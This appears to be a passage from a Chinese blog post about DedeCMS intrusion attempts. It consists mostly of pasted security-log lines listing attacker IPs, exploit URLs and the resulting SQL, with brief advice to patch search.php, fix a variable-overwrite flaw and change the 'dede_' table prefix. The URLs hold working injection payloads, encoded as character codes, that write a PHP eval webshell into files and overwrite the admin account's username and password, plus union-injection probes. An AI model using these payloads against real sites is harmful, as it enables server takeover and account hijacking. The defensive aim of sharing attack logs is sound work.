99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=46&arrs2%5B%5D=46&arrs2%5B%5D=47&arrs2%5B%5D=117&arrs2%5B%5D=112&arrs2%5B%5D=108&arrs2%5B%5D=111&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=115&arrs2%5B%5D=47&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&arrs2%5B%5D=36&arrs2%5B%5D=95&arrs2%5B%5D=80&arrs2%5B%5D=79&arrs2%5B%5D=83&arrs2%5B%5D=84&arrs2%5B%5D=91&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=111&arrs2%5B%5D=104&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=93&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=32&arrs2%5B%5D=87&arrs2%5B%5D=72&arrs2%5B%5D=69&arrs2%5B%5D=82&arrs2%5B%5D=69&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=49&arrs2%5B%5D=51&arrs2%5B%5D=32&arrs2%5B%5D=35||
INSERT INTO `dede_myad` SET `normbody` = ‘
eval($_POST[guohui]);echo royal;?>”);?>’ WHERE `aid` =13 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
42.96.166.217||//plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&arrs2%5B%5D=36&arrs2%5B%5D=95&arrs2%5B%5D=80&arrs2%5B%5D=79&arrs2%5B%5D=83&arrs2%5B%5D=84&arrs2%5B%5D=91&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=111&arrs2%5B%5D=104&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=93&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=32&arrs2%5B%5D=87&arrs2%5B%5D=72&arrs2%5B%5D=69&arrs2%5B%5D=82&arrs2%5B%5D=69&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=49&arrs2%5B%5D=55&arrs2%5B%5D=32&arrs2%5B%5D=35||
INSERT INTO `dede_myad` SET `normbody` = ‘
eval($_POST[guohui]);echo royal;?>”);?>’ WHERE `aid` =17 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
59.34.131.180||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
113.47.33.99||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=118&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=49&arrs2[]=49&arrs2[]=48&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”axxxxx”);echo ”OK”;@fclose($fp);?>’ where aid =1
#downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
111.11.113.210||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=118&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”axxxxx”);echo ”OK”;@fclose($fp);?>’ where aid =1
#downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
110.84.44.179||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
110.84.44.179||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
112.25.12.14||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
112.25.12.14||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
60.173.26.81||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
60.173.26.81||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
60.178.57.41||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
60.178.57.41||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
60.178.57.41||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
由此可见,/plus/search.php 相当危险的,所以得去打补丁,或当其删除.
include/dedesql.class.php, 变量覆盖漏洞,把这个漏洞堵上,就会好很多,这样就不会乱注入了.
改前缀,这样才不会被注入!
218.30.117.72||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35|| INSERT INTO `dede_#downloads`(`hash`,`id`,`downloads`) VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
123.144.188.192||/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=109&arrs2%5B%5D=105&arrs2%5B%5D=110&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=117&arrs2%5B%5D=115&arrs2%5B%5D=101&arrs2%5B%5D=114&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=61&arrs2%5B%5D=39&arrs2%5B%5D=115&arrs2%5B%5D=112&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=114&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=112&arrs2%5B%5D=119&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=61&arrs2%5B%5D=39&arrs2%5B%5D=102&arrs2%5B%5D=50&arrs2%5B%5D=57&arrs2%5B%5D=55&arrs2%5B%5D=97&arrs2%5B%5D=53&arrs2%5B%5D=55&arrs2%5B%5D=97&arrs2%5B%5D=53&arrs2%5B%5D=97&arrs2%5B%5D=55&arrs2%5B%5D=52&arrs2%5B%5D=51&arrs2%5B%5D=56&arrs2%5B%5D=57&arrs2%5B%5D=52&arrs2%5B%5D=97&arrs2%5B%5D=48&arrs2%5B%5D=101&arrs2%5B%5D=52&arrs2%5B%5D=39&arrs2%5B%5D=32&arrs2%5B%5D=119&arrs2%5B%5D=104&arrs2%5B%5D=101&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=32&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=61&arrs2%5B%5D=49&arrs2%5B%5D=32&arrs2%5B%5D=35|| INSERT INTO `dede_admin` SET `userid`=’spider’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #downloads`(`hash`,`id`,`downloads`) VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
所以一定要改前缀,不能用dede_